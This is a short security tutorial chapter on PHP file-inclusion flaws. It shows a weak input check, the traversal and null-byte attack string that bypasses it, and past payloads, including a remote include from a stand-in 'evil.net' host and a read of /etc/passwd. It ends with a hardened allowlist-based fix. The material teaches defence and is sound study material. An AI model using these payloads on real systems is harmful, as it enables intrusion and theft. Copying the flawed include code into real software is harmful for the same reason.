Variable Poisoning :: Chapter 3

[Past Exploits]
  1. ./?page=ftp://user:pass@evil.net/arbitrary_code.php
  2. ./?page=../../../../../../../etc/passwd
New Code:
  // php.ini :: allow_url_fopen = Off   (stops the ftp:// remote include from Chapter 2)
  // Suffix check only: any value ending in ".php" passes, whatever comes before it
  if (!preg_match ('/\.php$/i', $_GET['page'])) {
      die ('Invalid request.');
  }
  // Single, non-recursive pass: "....//" turns into "../" once the inner "../" is removed
  $include_file = str_replace ('../', '', $_GET['page']);
  $path = '/path/to/file/';
  if (file_exists ($path . $include_file)) {
      // On PHP builds that truncate paths at a null byte, the ".php" suffix is never seen
      include $path . $include_file;
  }
Attack:
  ./?page=....//....//....//....//....//....//....//etc/passwd%00.php
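A fixed version of the include, added here as an example and not the chapter's own code. It assumes the includable pages live under a ./pages directory and that their names are known in advance (the $allowed list); the strict name pattern, the allowlist and the realpath() prefix check each independently reject the "....//" and "%00.php" tricks shown above.

```php
<?php
// Hardened replacement for the "New Code" above (added example, not the
// chapter's code). Assumptions: pages live under $base, and only the
// names in $allowed may ever be included.
declare(strict_types=1);

function safe_page_path(string $page, string $base, array $allowed): ?string
{
    // 1. Accept only a plain page name: letters, digits, "_" or "-" plus a
    //    single ".php" suffix. \A and \z anchor the whole string (unlike $,
    //    which still matches before a trailing newline), so slashes, "..",
    //    and NUL bytes can never be part of an accepted value.
    if (!preg_match('/\A[A-Za-z0-9_-]+\.php\z/', $page)) {
        return null;
    }

    // 2. Allowlist: the name must be one we deliberately expose. This check
    //    alone is sufficient; the rest is defence in depth.
    if (!in_array($page, $allowed, true)) {
        return null;
    }

    // 3. Canonicalise and confirm the resolved file still sits inside $base.
    //    realpath() follows symlinks and collapses "..", so a traversal that
    //    somehow survived the checks above fails the prefix comparison here.
    $realBase = realpath($base);
    $realFile = realpath($base . DIRECTORY_SEPARATOR . $page);
    if ($realBase === false || $realFile === false) {
        return null;
    }
    $prefix = $realBase . DIRECTORY_SEPARATOR;
    if (strncmp($realFile, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $realFile;
}

$base    = __DIR__ . '/pages';          // assumed page directory
$allowed = ['home.php', 'about.php'];   // assumed allowlist of includable pages

$path = safe_page_path((string)($_GET['page'] ?? ''), $base, $allowed);
if ($path === null) {
    http_response_code(400);
    die('Invalid request.');
}
include $path;
```

With this in place, ./?page=....//....//etc/passwd%00.php fails at step 1 before any filesystem call is made, and a stray home.php symlink pointing outside ./pages is caught at step 3.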